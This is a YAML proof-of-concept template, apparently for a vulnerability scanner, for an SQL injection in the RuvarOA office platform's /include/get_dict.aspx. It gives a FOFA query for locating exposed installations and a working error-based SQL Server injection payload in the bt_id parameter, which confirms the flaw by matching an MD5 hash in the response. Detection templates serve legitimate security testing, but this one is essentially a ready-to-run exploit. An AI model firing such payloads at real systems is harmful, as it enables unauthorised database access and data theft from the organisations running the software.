product: RuvarOA
vName: RuvarOA get_dict.aspx存在SQL注入漏洞
type: SQL注入
vID: [ ]
level: 3
vDesc: RuvarOA协同办公平台/include/get_dict.aspx存在SQL注入
version: ''
note: ''
search:
  FOFA: app="RUVAR-OA"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /include/get_dict.aspx?bi_value=1&bt_id=1) AND 1248 IN sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')) AND (2558=2558&bt_name=1&bi_name=1
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: 'and'